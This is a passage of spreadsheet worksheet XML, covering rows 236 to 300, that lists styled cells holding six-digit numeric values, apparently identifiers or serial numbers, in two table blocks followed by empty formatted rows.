      <c r="A236" s="4"/>
      <c r="B236" s="7" t="s">
        <v>55</v>
      </c>
      <c r="C236" s="8"/>
      <c r="D236" s="8"/>
      <c r="E236" s="8"/>
      <c r="F236" s="8"/>
      <c r="G236" s="8"/>
      <c r="H236" s="8"/>
      <c r="I236" s="97"/>
    </row>
    <row r="237" spans="1:9" ht="14.25" thickBot="1">
      <c r="A237" s="5"/>
      <c r="B237" s="99"/>
      <c r="C237" s="99"/>
      <c r="D237" s="99"/>
      <c r="E237" s="99"/>
      <c r="F237" s="99"/>
      <c r="G237" s="99"/>
      <c r="H237" s="99"/>
      <c r="I237" s="106"/>
    </row>
    <row r="238" spans="1:14" ht="14.25" thickTop="1">
      <c r="A238" s="2" t="s">
        <v>33</v>
      </c>
      <c r="B238" s="107" t="s">
        <v>34</v>
      </c>
      <c r="C238" s="108"/>
      <c r="D238" s="109"/>
      <c r="E238" s="109"/>
      <c r="F238" s="109"/>
      <c r="G238" s="109"/>
      <c r="H238" s="109"/>
      <c r="I238" s="110"/>
      <c r="N238" s="98"/>
    </row>
    <row r="239" spans="1:14" ht="14.25" thickBot="1">
      <c r="A239" s="3" t="s">
        <v>35</v>
      </c>
      <c r="B239" s="111" t="s">
        <v>36</v>
      </c>
      <c r="C239" s="112"/>
      <c r="D239" s="113"/>
      <c r="E239" s="113"/>
      <c r="F239" s="113"/>
      <c r="G239" s="113"/>
      <c r="H239" s="113"/>
      <c r="I239" s="114"/>
      <c r="N239" s="98"/>
    </row>
    <row r="240" spans="1:14" ht="15" thickBot="1" thickTop="1">
      <c r="A240" s="4"/>
      <c r="B240" s="100"/>
      <c r="C240" s="101"/>
      <c r="D240" s="101"/>
      <c r="E240" s="101"/>
      <c r="F240" s="101"/>
      <c r="G240" s="101"/>
      <c r="H240" s="101"/>
      <c r="I240" s="102"/>
      <c r="N240" s="98"/>
    </row>
    <row r="241" spans="1:14" ht="14.25" thickTop="1">
      <c r="A241" s="15"/>
      <c r="B241" s="191">
        <v>356914</v>
      </c>
      <c r="C241" s="192">
        <v>37799</v>
      </c>
      <c r="D241" s="192">
        <v>467008</v>
      </c>
      <c r="E241" s="192">
        <v>534291</v>
      </c>
      <c r="F241" s="192">
        <v>940914</v>
      </c>
      <c r="G241" s="192">
        <v>940925</v>
      </c>
      <c r="H241" s="192">
        <v>940951</v>
      </c>
      <c r="I241" s="193">
        <v>940981</v>
      </c>
      <c r="K241" s="98" t="s">
        <v>39</v>
      </c>
      <c r="N241" s="98"/>
    </row>
    <row r="242" spans="1:14" ht="13.5">
      <c r="A242" s="147" t="s">
        <v>90</v>
      </c>
      <c r="B242" s="154">
        <v>356915</v>
      </c>
      <c r="C242" s="126">
        <v>379220</v>
      </c>
      <c r="D242" s="126">
        <v>467009</v>
      </c>
      <c r="E242" s="126">
        <v>547609</v>
      </c>
      <c r="F242" s="126">
        <v>940915</v>
      </c>
      <c r="G242" s="126">
        <v>940926</v>
      </c>
      <c r="H242" s="126">
        <v>940952</v>
      </c>
      <c r="I242" s="129">
        <v>940991</v>
      </c>
      <c r="K242" s="98" t="s">
        <v>39</v>
      </c>
      <c r="N242" s="98"/>
    </row>
    <row r="243" spans="1:14" ht="13.5">
      <c r="A243" s="19"/>
      <c r="B243" s="154">
        <v>356916</v>
      </c>
      <c r="C243" s="126">
        <v>406158</v>
      </c>
      <c r="D243" s="126">
        <v>483543</v>
      </c>
      <c r="E243" s="126">
        <v>548238</v>
      </c>
      <c r="F243" s="126">
        <v>940916</v>
      </c>
      <c r="G243" s="126">
        <v>940930</v>
      </c>
      <c r="H243" s="126">
        <v>940953</v>
      </c>
      <c r="I243" s="137"/>
      <c r="N243" s="98"/>
    </row>
    <row r="244" spans="1:14" ht="13.5">
      <c r="A244" s="19" t="s">
        <v>56</v>
      </c>
      <c r="B244" s="154">
        <v>37625</v>
      </c>
      <c r="C244" s="126">
        <v>414710</v>
      </c>
      <c r="D244" s="126">
        <v>483544</v>
      </c>
      <c r="E244" s="126">
        <v>552136</v>
      </c>
      <c r="F244" s="126">
        <v>940917</v>
      </c>
      <c r="G244" s="126">
        <v>940931</v>
      </c>
      <c r="H244" s="126">
        <v>940960</v>
      </c>
      <c r="I244" s="137"/>
      <c r="N244" s="98"/>
    </row>
    <row r="245" spans="1:14" ht="13.5" customHeight="1">
      <c r="A245" s="125"/>
      <c r="B245" s="154">
        <v>37626</v>
      </c>
      <c r="C245" s="126">
        <v>421468</v>
      </c>
      <c r="D245" s="126">
        <v>488906</v>
      </c>
      <c r="E245" s="126">
        <v>553155</v>
      </c>
      <c r="F245" s="126">
        <v>940918</v>
      </c>
      <c r="G245" s="126">
        <v>940932</v>
      </c>
      <c r="H245" s="126">
        <v>940961</v>
      </c>
      <c r="I245" s="137"/>
      <c r="N245" s="98"/>
    </row>
    <row r="246" spans="1:14" ht="13.5" customHeight="1">
      <c r="A246" s="125"/>
      <c r="B246" s="154">
        <v>37627</v>
      </c>
      <c r="C246" s="126">
        <v>436417</v>
      </c>
      <c r="D246" s="126">
        <v>488972</v>
      </c>
      <c r="E246" s="126">
        <v>553169</v>
      </c>
      <c r="F246" s="126">
        <v>940919</v>
      </c>
      <c r="G246" s="126">
        <v>940933</v>
      </c>
      <c r="H246" s="126">
        <v>940962</v>
      </c>
      <c r="I246" s="137"/>
      <c r="N246" s="98"/>
    </row>
    <row r="247" spans="1:14" ht="13.5" customHeight="1">
      <c r="A247" s="125"/>
      <c r="B247" s="154">
        <v>37629</v>
      </c>
      <c r="C247" s="126">
        <v>436477</v>
      </c>
      <c r="D247" s="126">
        <v>489904</v>
      </c>
      <c r="E247" s="126">
        <v>556608</v>
      </c>
      <c r="F247" s="126">
        <v>940920</v>
      </c>
      <c r="G247" s="126">
        <v>940934</v>
      </c>
      <c r="H247" s="126">
        <v>940963</v>
      </c>
      <c r="I247" s="137"/>
      <c r="N247" s="98"/>
    </row>
    <row r="248" spans="1:14" ht="13.5" customHeight="1">
      <c r="A248" s="125"/>
      <c r="B248" s="154">
        <v>376290</v>
      </c>
      <c r="C248" s="126">
        <v>436511</v>
      </c>
      <c r="D248" s="126">
        <v>490274</v>
      </c>
      <c r="E248" s="224">
        <v>625904</v>
      </c>
      <c r="F248" s="126">
        <v>940921</v>
      </c>
      <c r="G248" s="126">
        <v>940935</v>
      </c>
      <c r="H248" s="126">
        <v>940964</v>
      </c>
      <c r="I248" s="137"/>
      <c r="N248" s="98"/>
    </row>
    <row r="249" spans="1:14" ht="13.5" customHeight="1">
      <c r="A249" s="125"/>
      <c r="B249" s="154">
        <v>376291</v>
      </c>
      <c r="C249" s="126">
        <v>464959</v>
      </c>
      <c r="D249" s="126">
        <v>512462</v>
      </c>
      <c r="E249" s="126">
        <v>940911</v>
      </c>
      <c r="F249" s="126">
        <v>940922</v>
      </c>
      <c r="G249" s="126">
        <v>940936</v>
      </c>
      <c r="H249" s="126">
        <v>940965</v>
      </c>
      <c r="I249" s="137"/>
      <c r="N249" s="98"/>
    </row>
    <row r="250" spans="1:14" ht="13.5" customHeight="1">
      <c r="A250" s="125"/>
      <c r="B250" s="154">
        <v>376292</v>
      </c>
      <c r="C250" s="126">
        <v>467006</v>
      </c>
      <c r="D250" s="126">
        <v>520045</v>
      </c>
      <c r="E250" s="126">
        <v>940912</v>
      </c>
      <c r="F250" s="126">
        <v>940923</v>
      </c>
      <c r="G250" s="126">
        <v>940940</v>
      </c>
      <c r="H250" s="126">
        <v>940967</v>
      </c>
      <c r="I250" s="137"/>
      <c r="N250" s="98"/>
    </row>
    <row r="251" spans="1:14" ht="13.5" customHeight="1">
      <c r="A251" s="15"/>
      <c r="B251" s="154">
        <v>377973</v>
      </c>
      <c r="C251" s="126">
        <v>467007</v>
      </c>
      <c r="D251" s="126">
        <v>528937</v>
      </c>
      <c r="E251" s="126">
        <v>940913</v>
      </c>
      <c r="F251" s="126">
        <v>940924</v>
      </c>
      <c r="G251" s="126">
        <v>940941</v>
      </c>
      <c r="H251" s="126">
        <v>940970</v>
      </c>
      <c r="I251" s="137"/>
      <c r="N251" s="98"/>
    </row>
    <row r="252" spans="1:14" ht="14.25" thickBot="1">
      <c r="A252" s="153"/>
      <c r="B252" s="10"/>
      <c r="C252" s="11"/>
      <c r="D252" s="11"/>
      <c r="E252" s="11"/>
      <c r="F252" s="11"/>
      <c r="G252" s="11"/>
      <c r="H252" s="11"/>
      <c r="I252" s="12"/>
      <c r="N252" s="98"/>
    </row>
    <row r="253" spans="1:14" ht="15" thickBot="1" thickTop="1">
      <c r="A253" s="15"/>
      <c r="B253" s="100"/>
      <c r="C253" s="101"/>
      <c r="D253" s="101"/>
      <c r="E253" s="101"/>
      <c r="F253" s="101"/>
      <c r="G253" s="101"/>
      <c r="H253" s="101"/>
      <c r="I253" s="102"/>
      <c r="M253" s="98"/>
      <c r="N253" s="98"/>
    </row>
    <row r="254" spans="1:14" ht="14.25" thickTop="1">
      <c r="A254" s="15"/>
      <c r="B254" s="191">
        <v>71</v>
      </c>
      <c r="C254" s="192">
        <v>426271</v>
      </c>
      <c r="D254" s="183">
        <v>458484</v>
      </c>
      <c r="E254" s="192">
        <v>485492</v>
      </c>
      <c r="F254" s="192">
        <v>540926</v>
      </c>
      <c r="G254" s="192">
        <v>554345</v>
      </c>
      <c r="H254" s="192">
        <v>941046</v>
      </c>
      <c r="I254" s="193">
        <v>944541</v>
      </c>
      <c r="M254" s="98"/>
      <c r="N254" s="98"/>
    </row>
    <row r="255" spans="1:14" ht="13.5">
      <c r="A255" s="15"/>
      <c r="B255" s="154">
        <v>356316</v>
      </c>
      <c r="C255" s="130">
        <v>426281</v>
      </c>
      <c r="D255" s="130">
        <v>458568</v>
      </c>
      <c r="E255" s="130">
        <v>485493</v>
      </c>
      <c r="F255" s="126">
        <v>540929</v>
      </c>
      <c r="G255" s="126">
        <v>554346</v>
      </c>
      <c r="H255" s="126">
        <v>941047</v>
      </c>
      <c r="I255" s="129">
        <v>944542</v>
      </c>
      <c r="N255" s="98"/>
    </row>
    <row r="256" spans="1:9" ht="13.5">
      <c r="A256" s="15"/>
      <c r="B256" s="154">
        <v>356317</v>
      </c>
      <c r="C256" s="130">
        <v>426586</v>
      </c>
      <c r="D256" s="130">
        <v>459910</v>
      </c>
      <c r="E256" s="130">
        <v>498819</v>
      </c>
      <c r="F256" s="126">
        <v>540935</v>
      </c>
      <c r="G256" s="126">
        <v>554349</v>
      </c>
      <c r="H256" s="126">
        <v>941048</v>
      </c>
      <c r="I256" s="129">
        <v>944543</v>
      </c>
    </row>
    <row r="257" spans="1:9" ht="13.5">
      <c r="A257" s="15"/>
      <c r="B257" s="154">
        <v>356406</v>
      </c>
      <c r="C257" s="130">
        <v>433276</v>
      </c>
      <c r="D257" s="130">
        <v>459911</v>
      </c>
      <c r="E257" s="130">
        <v>498820</v>
      </c>
      <c r="F257" s="126">
        <v>540936</v>
      </c>
      <c r="G257" s="126">
        <v>554382</v>
      </c>
      <c r="H257" s="126">
        <v>941049</v>
      </c>
      <c r="I257" s="129">
        <v>944545</v>
      </c>
    </row>
    <row r="258" spans="1:9" ht="13.5">
      <c r="A258" s="127"/>
      <c r="B258" s="154">
        <v>356407</v>
      </c>
      <c r="C258" s="130">
        <v>433283</v>
      </c>
      <c r="D258" s="126">
        <v>459912</v>
      </c>
      <c r="E258" s="126">
        <v>502123</v>
      </c>
      <c r="F258" s="126">
        <v>540947</v>
      </c>
      <c r="G258" s="126">
        <v>554959</v>
      </c>
      <c r="H258" s="126">
        <v>941116</v>
      </c>
      <c r="I258" s="129">
        <v>944546</v>
      </c>
    </row>
    <row r="259" spans="1:9" ht="13.5">
      <c r="A259" s="125"/>
      <c r="B259" s="154">
        <v>356910</v>
      </c>
      <c r="C259" s="126">
        <v>433290</v>
      </c>
      <c r="D259" s="126">
        <v>459913</v>
      </c>
      <c r="E259" s="126">
        <v>516453</v>
      </c>
      <c r="F259" s="126">
        <v>540988</v>
      </c>
      <c r="G259" s="126">
        <v>554963</v>
      </c>
      <c r="H259" s="126">
        <v>941117</v>
      </c>
      <c r="I259" s="129">
        <v>944547</v>
      </c>
    </row>
    <row r="260" spans="1:9" ht="13.5">
      <c r="A260" s="15"/>
      <c r="B260" s="154">
        <v>356911</v>
      </c>
      <c r="C260" s="126">
        <v>448135</v>
      </c>
      <c r="D260" s="209">
        <v>463235</v>
      </c>
      <c r="E260" s="126">
        <v>520172</v>
      </c>
      <c r="F260" s="126">
        <v>541468</v>
      </c>
      <c r="G260" s="126">
        <v>554973</v>
      </c>
      <c r="H260" s="126">
        <v>942049</v>
      </c>
      <c r="I260" s="138">
        <v>944548</v>
      </c>
    </row>
    <row r="261" spans="1:9" ht="13.5">
      <c r="A261" s="147" t="s">
        <v>57</v>
      </c>
      <c r="B261" s="154">
        <v>356912</v>
      </c>
      <c r="C261" s="126">
        <v>448136</v>
      </c>
      <c r="D261" s="126">
        <v>464022</v>
      </c>
      <c r="E261" s="126">
        <v>522108</v>
      </c>
      <c r="F261" s="126">
        <v>542416</v>
      </c>
      <c r="G261" s="126">
        <v>555027</v>
      </c>
      <c r="H261" s="126">
        <v>943016</v>
      </c>
      <c r="I261" s="129">
        <v>945010</v>
      </c>
    </row>
    <row r="262" spans="1:9" ht="13.5">
      <c r="A262" s="19"/>
      <c r="B262" s="154">
        <v>400696</v>
      </c>
      <c r="C262" s="126">
        <v>448537</v>
      </c>
      <c r="D262" s="165">
        <v>467309</v>
      </c>
      <c r="E262" s="126">
        <v>522109</v>
      </c>
      <c r="F262" s="126">
        <v>542586</v>
      </c>
      <c r="G262" s="126">
        <v>558526</v>
      </c>
      <c r="H262" s="126">
        <v>943017</v>
      </c>
      <c r="I262" s="129">
        <v>945034</v>
      </c>
    </row>
    <row r="263" spans="1:9" ht="13.5">
      <c r="A263" s="128" t="s">
        <v>58</v>
      </c>
      <c r="B263" s="154">
        <v>402849</v>
      </c>
      <c r="C263" s="126">
        <v>448555</v>
      </c>
      <c r="D263" s="126">
        <v>470616</v>
      </c>
      <c r="E263" s="126">
        <v>522802</v>
      </c>
      <c r="F263" s="126">
        <v>543017</v>
      </c>
      <c r="G263" s="126">
        <v>558975</v>
      </c>
      <c r="H263" s="126">
        <v>943116</v>
      </c>
      <c r="I263" s="129">
        <v>946116</v>
      </c>
    </row>
    <row r="264" spans="1:9" ht="12" customHeight="1">
      <c r="A264" s="125"/>
      <c r="B264" s="154">
        <v>402850</v>
      </c>
      <c r="C264" s="126">
        <v>452387</v>
      </c>
      <c r="D264" s="126">
        <v>470617</v>
      </c>
      <c r="E264" s="126">
        <v>522971</v>
      </c>
      <c r="F264" s="126">
        <v>543241</v>
      </c>
      <c r="G264" s="126">
        <v>558976</v>
      </c>
      <c r="H264" s="126">
        <v>943117</v>
      </c>
      <c r="I264" s="129">
        <v>946117</v>
      </c>
    </row>
    <row r="265" spans="1:18" s="43" customFormat="1" ht="13.5">
      <c r="A265" s="14"/>
      <c r="B265" s="154">
        <v>407558</v>
      </c>
      <c r="C265" s="126">
        <v>452388</v>
      </c>
      <c r="D265" s="126">
        <v>470630</v>
      </c>
      <c r="E265" s="126">
        <v>524028</v>
      </c>
      <c r="F265" s="126">
        <v>546111</v>
      </c>
      <c r="G265" s="126">
        <v>606052</v>
      </c>
      <c r="H265" s="126">
        <v>943541</v>
      </c>
      <c r="I265" s="129">
        <v>946216</v>
      </c>
      <c r="K265" s="42"/>
      <c r="L265" s="42"/>
      <c r="M265" s="42"/>
      <c r="N265" s="42"/>
      <c r="O265" s="42"/>
      <c r="P265" s="42"/>
      <c r="Q265" s="42"/>
      <c r="R265" s="42"/>
    </row>
    <row r="266" spans="1:18" s="43" customFormat="1" ht="13.5">
      <c r="A266" s="14"/>
      <c r="B266" s="154">
        <v>407617</v>
      </c>
      <c r="C266" s="126">
        <v>452389</v>
      </c>
      <c r="D266" s="126">
        <v>470631</v>
      </c>
      <c r="E266" s="126">
        <v>524140</v>
      </c>
      <c r="F266" s="126">
        <v>546112</v>
      </c>
      <c r="G266" s="126">
        <v>606053</v>
      </c>
      <c r="H266" s="126">
        <v>943542</v>
      </c>
      <c r="I266" s="129">
        <v>946217</v>
      </c>
      <c r="K266" s="42"/>
      <c r="L266" s="42"/>
      <c r="M266" s="42"/>
      <c r="N266" s="42"/>
      <c r="O266" s="42"/>
      <c r="P266" s="42"/>
      <c r="Q266" s="42"/>
      <c r="R266" s="42"/>
    </row>
    <row r="267" spans="1:18" s="43" customFormat="1" ht="13.5">
      <c r="A267" s="14"/>
      <c r="B267" s="154">
        <v>407916</v>
      </c>
      <c r="C267" s="126">
        <v>457318</v>
      </c>
      <c r="D267" s="126">
        <v>480444</v>
      </c>
      <c r="E267" s="126">
        <v>524141</v>
      </c>
      <c r="F267" s="126">
        <v>552386</v>
      </c>
      <c r="G267" s="126">
        <v>941016</v>
      </c>
      <c r="H267" s="126">
        <v>943543</v>
      </c>
      <c r="I267" s="129">
        <v>948816</v>
      </c>
      <c r="K267" s="42"/>
      <c r="L267" s="42"/>
      <c r="M267" s="42"/>
      <c r="N267" s="42"/>
      <c r="O267" s="42"/>
      <c r="P267" s="42"/>
      <c r="Q267" s="42"/>
      <c r="R267" s="42"/>
    </row>
    <row r="268" spans="1:18" s="43" customFormat="1" ht="13.5">
      <c r="A268" s="14"/>
      <c r="B268" s="154">
        <v>407917</v>
      </c>
      <c r="C268" s="126">
        <v>457905</v>
      </c>
      <c r="D268" s="126">
        <v>485475</v>
      </c>
      <c r="E268" s="126">
        <v>524225</v>
      </c>
      <c r="F268" s="126">
        <v>552387</v>
      </c>
      <c r="G268" s="126">
        <v>941040</v>
      </c>
      <c r="H268" s="126">
        <v>943544</v>
      </c>
      <c r="I268" s="129"/>
      <c r="K268" s="42"/>
      <c r="L268" s="42"/>
      <c r="M268" s="42"/>
      <c r="N268" s="42"/>
      <c r="O268" s="42"/>
      <c r="P268" s="42"/>
      <c r="Q268" s="42"/>
      <c r="R268" s="42"/>
    </row>
    <row r="269" spans="1:18" s="43" customFormat="1" ht="13.5">
      <c r="A269" s="14"/>
      <c r="B269" s="154">
        <v>409216</v>
      </c>
      <c r="C269" s="126">
        <v>457906</v>
      </c>
      <c r="D269" s="126">
        <v>485476</v>
      </c>
      <c r="E269" s="126">
        <v>524226</v>
      </c>
      <c r="F269" s="126">
        <v>553151</v>
      </c>
      <c r="G269" s="126">
        <v>941041</v>
      </c>
      <c r="H269" s="126">
        <v>943645</v>
      </c>
      <c r="I269" s="129"/>
      <c r="K269" s="42"/>
      <c r="L269" s="42"/>
      <c r="M269" s="42"/>
      <c r="N269" s="42"/>
      <c r="O269" s="42"/>
      <c r="P269" s="42"/>
      <c r="Q269" s="42"/>
      <c r="R269" s="42"/>
    </row>
    <row r="270" spans="1:18" s="43" customFormat="1" ht="13.5">
      <c r="A270" s="14"/>
      <c r="B270" s="154">
        <v>409217</v>
      </c>
      <c r="C270" s="126">
        <v>457972</v>
      </c>
      <c r="D270" s="126">
        <v>485477</v>
      </c>
      <c r="E270" s="126">
        <v>533171</v>
      </c>
      <c r="F270" s="126">
        <v>553171</v>
      </c>
      <c r="G270" s="126">
        <v>941042</v>
      </c>
      <c r="H270" s="126">
        <v>943646</v>
      </c>
      <c r="I270" s="129"/>
      <c r="K270" s="42"/>
      <c r="L270" s="42"/>
      <c r="M270" s="42"/>
      <c r="N270" s="42"/>
      <c r="O270" s="42"/>
      <c r="P270" s="42"/>
      <c r="Q270" s="42"/>
      <c r="R270" s="42"/>
    </row>
    <row r="271" spans="1:18" s="43" customFormat="1" ht="13.5">
      <c r="A271" s="14"/>
      <c r="B271" s="154">
        <v>414743</v>
      </c>
      <c r="C271" s="126">
        <v>457973</v>
      </c>
      <c r="D271" s="126">
        <v>485478</v>
      </c>
      <c r="E271" s="126">
        <v>533172</v>
      </c>
      <c r="F271" s="126">
        <v>553172</v>
      </c>
      <c r="G271" s="126">
        <v>941043</v>
      </c>
      <c r="H271" s="126">
        <v>943647</v>
      </c>
      <c r="I271" s="129"/>
      <c r="K271" s="42"/>
      <c r="L271" s="42"/>
      <c r="M271" s="42"/>
      <c r="N271" s="42"/>
      <c r="O271" s="42"/>
      <c r="P271" s="42"/>
      <c r="Q271" s="42"/>
      <c r="R271" s="42"/>
    </row>
    <row r="272" spans="1:18" s="43" customFormat="1" ht="12" customHeight="1">
      <c r="A272" s="14"/>
      <c r="B272" s="225">
        <v>425863</v>
      </c>
      <c r="C272" s="126">
        <v>457992</v>
      </c>
      <c r="D272" s="126">
        <v>485479</v>
      </c>
      <c r="E272" s="219"/>
      <c r="F272" s="126">
        <v>553180</v>
      </c>
      <c r="G272" s="126">
        <v>941044</v>
      </c>
      <c r="H272" s="126">
        <v>944116</v>
      </c>
      <c r="I272" s="129"/>
      <c r="K272" s="42"/>
      <c r="L272" s="42"/>
      <c r="M272" s="42"/>
      <c r="N272" s="42"/>
      <c r="O272" s="42"/>
      <c r="P272" s="42"/>
      <c r="Q272" s="42"/>
      <c r="R272" s="42"/>
    </row>
    <row r="273" spans="1:18" s="43" customFormat="1" ht="14.25" thickBot="1">
      <c r="A273" s="14"/>
      <c r="B273" s="199"/>
      <c r="C273" s="159">
        <v>457993</v>
      </c>
      <c r="D273" s="195">
        <v>485480</v>
      </c>
      <c r="E273" s="195"/>
      <c r="F273" s="195">
        <v>553181</v>
      </c>
      <c r="G273" s="195">
        <v>941045</v>
      </c>
      <c r="H273" s="195">
        <v>944117</v>
      </c>
      <c r="I273" s="200"/>
      <c r="K273" s="42"/>
      <c r="L273" s="42"/>
      <c r="M273" s="42"/>
      <c r="N273" s="42"/>
      <c r="O273" s="42"/>
      <c r="P273" s="42"/>
      <c r="Q273" s="42"/>
      <c r="R273" s="42"/>
    </row>
    <row r="274" spans="1:18" s="43" customFormat="1" ht="15" thickBot="1" thickTop="1">
      <c r="A274" s="5"/>
      <c r="B274" s="10"/>
      <c r="C274" s="11" t="s">
        <v>39</v>
      </c>
      <c r="D274" s="11"/>
      <c r="E274" s="11"/>
      <c r="F274" s="11"/>
      <c r="G274" s="11"/>
      <c r="H274" s="11"/>
      <c r="I274" s="12"/>
      <c r="K274" s="42"/>
      <c r="L274" s="42"/>
      <c r="M274" s="42"/>
      <c r="N274" s="42"/>
      <c r="O274" s="42"/>
      <c r="P274" s="42"/>
      <c r="Q274" s="42"/>
      <c r="R274" s="42"/>
    </row>
    <row r="275" spans="1:18" s="43" customFormat="1" ht="14.25" thickTop="1">
      <c r="A275" s="42"/>
      <c r="B275" s="42"/>
      <c r="C275" s="42"/>
      <c r="D275" s="42"/>
      <c r="E275" s="42"/>
      <c r="F275" s="42"/>
      <c r="G275" s="42"/>
      <c r="H275" s="42"/>
      <c r="I275" s="42"/>
      <c r="K275" s="42"/>
      <c r="L275" s="42"/>
      <c r="M275" s="42"/>
      <c r="N275" s="42"/>
      <c r="O275" s="42"/>
      <c r="P275" s="42"/>
      <c r="Q275" s="42"/>
      <c r="R275" s="42"/>
    </row>
    <row r="279" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K279" s="42"/>
      <c r="L279" s="42"/>
      <c r="M279" s="42"/>
      <c r="N279" s="42"/>
      <c r="O279" s="42"/>
      <c r="P279" s="42"/>
      <c r="Q279" s="42"/>
      <c r="R279" s="42"/>
    </row>
    <row r="280" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K280" s="42"/>
      <c r="L280" s="42"/>
      <c r="M280" s="42"/>
      <c r="N280" s="42"/>
      <c r="O280" s="42"/>
      <c r="P280" s="42"/>
      <c r="Q280" s="42"/>
      <c r="R280" s="42"/>
    </row>
    <row r="281" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K281" s="42"/>
      <c r="L281" s="42"/>
      <c r="M281" s="42"/>
      <c r="N281" s="42"/>
      <c r="O281" s="42"/>
      <c r="P281" s="42"/>
      <c r="Q281" s="42"/>
      <c r="R281" s="42"/>
    </row>
    <row r="282" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K282" s="42"/>
      <c r="L282" s="42"/>
      <c r="M282" s="42"/>
      <c r="N282" s="42"/>
      <c r="O282" s="42"/>
      <c r="P282" s="42"/>
      <c r="Q282" s="42"/>
      <c r="R282" s="42"/>
    </row>
    <row r="283" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K283" s="42"/>
      <c r="L283" s="42"/>
      <c r="M283" s="42"/>
      <c r="N283" s="42"/>
      <c r="O283" s="42"/>
      <c r="P283" s="42"/>
      <c r="Q283" s="42"/>
      <c r="R283" s="42"/>
    </row>
    <row r="284" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K284" s="42"/>
      <c r="L284" s="42"/>
      <c r="M284" s="42"/>
      <c r="N284" s="42"/>
      <c r="O284" s="42"/>
      <c r="P284" s="42"/>
      <c r="Q284" s="42"/>
      <c r="R284" s="42"/>
    </row>
    <row r="285" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K285" s="42"/>
      <c r="L285" s="42"/>
      <c r="M285" s="42"/>
      <c r="N285" s="42"/>
      <c r="O285" s="42"/>
      <c r="P285" s="42"/>
      <c r="Q285" s="42"/>
      <c r="R285" s="42"/>
    </row>
    <row r="286" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K286" s="42"/>
      <c r="L286" s="42"/>
      <c r="M286" s="42"/>
      <c r="N286" s="42"/>
      <c r="O286" s="42"/>
      <c r="P286" s="42"/>
      <c r="Q286" s="42"/>
      <c r="R286" s="42"/>
    </row>
    <row r="287" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K287" s="42"/>
      <c r="L287" s="42"/>
      <c r="M287" s="42"/>
      <c r="N287" s="42"/>
      <c r="O287" s="42"/>
      <c r="P287" s="42"/>
      <c r="Q287" s="42"/>
      <c r="R287" s="42"/>
    </row>
    <row r="288" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K288" s="42"/>
      <c r="L288" s="42"/>
      <c r="M288" s="42"/>
      <c r="N288" s="42"/>
      <c r="O288" s="42"/>
      <c r="P288" s="42"/>
      <c r="Q288" s="42"/>
      <c r="R288" s="42"/>
    </row>
    <row r="289" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K289" s="42"/>
      <c r="L289" s="42"/>
      <c r="M289" s="42"/>
      <c r="N289" s="42"/>
      <c r="O289" s="42"/>
      <c r="P289" s="42"/>
      <c r="Q289" s="42"/>
      <c r="R289" s="42"/>
    </row>
    <row r="290" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K290" s="42"/>
      <c r="L290" s="42"/>
      <c r="M290" s="42"/>
      <c r="N290" s="42"/>
      <c r="O290" s="42"/>
      <c r="P290" s="42"/>
      <c r="Q290" s="42"/>
      <c r="R290" s="42"/>
    </row>
    <row r="291" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K291" s="42"/>
      <c r="L291" s="42"/>
      <c r="M291" s="42"/>
      <c r="N291" s="42"/>
      <c r="O291" s="42"/>
      <c r="P291" s="42"/>
      <c r="Q291" s="42"/>
      <c r="R291" s="42"/>
    </row>
    <row r="292" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K292" s="42"/>
      <c r="L292" s="42"/>
      <c r="M292" s="42"/>
      <c r="N292" s="42"/>
      <c r="O292" s="42"/>
      <c r="P292" s="42"/>
      <c r="Q292" s="42"/>
      <c r="R292" s="42"/>
    </row>
    <row r="293" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K293" s="42"/>
      <c r="L293" s="42"/>
      <c r="M293" s="42"/>
      <c r="N293" s="42"/>
      <c r="O293" s="42"/>
      <c r="P293" s="42"/>
      <c r="Q293" s="42"/>
      <c r="R293" s="42"/>
    </row>
    <row r="294" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K294" s="42"/>
      <c r="L294" s="42"/>
      <c r="M294" s="42"/>
      <c r="N294" s="42"/>
      <c r="O294" s="42"/>
      <c r="P294" s="42"/>
      <c r="Q294" s="42"/>
      <c r="R294" s="42"/>
    </row>
    <row r="295" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K295" s="42"/>
      <c r="L295" s="42"/>
      <c r="M295" s="42"/>
      <c r="N295" s="42"/>
      <c r="O295" s="42"/>
      <c r="P295" s="42"/>
      <c r="Q295" s="42"/>
      <c r="R295" s="42"/>
    </row>
    <row r="296" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K296" s="42"/>
      <c r="L296" s="42"/>
      <c r="M296" s="42"/>
      <c r="N296" s="42"/>
      <c r="O296" s="42"/>
      <c r="P296" s="42"/>
      <c r="Q296" s="42"/>
      <c r="R296" s="42"/>
    </row>
    <row r="297" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K297" s="42"/>
      <c r="L297" s="42"/>
      <c r="M297" s="42"/>
      <c r="N297" s="42"/>
      <c r="O297" s="42"/>
      <c r="P297" s="42"/>
      <c r="Q297" s="42"/>
      <c r="R297" s="42"/>
    </row>
    <row r="298" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K298" s="42"/>
      <c r="L298" s="42"/>
      <c r="M298" s="42"/>
      <c r="N298" s="42"/>
      <c r="O298" s="42"/>
      <c r="P298" s="42"/>
      <c r="Q298" s="42"/>
      <c r="R298" s="42"/>
    </row>
    <row r="299" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K299" s="42"/>
      <c r="L299" s="42"/>
      <c r="M299" s="42"/>
      <c r="N299" s="42"/>
      <c r="O299" s="42"/>
      <c r="P299" s="42"/>
      <c r="Q299" s="42"/>
      <c r="R299" s="42"/>
    </row>
    <row r="300" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K300" s="42"/>
      <c r="L300" s="42"/>
      <c r="M300" s="42"/>
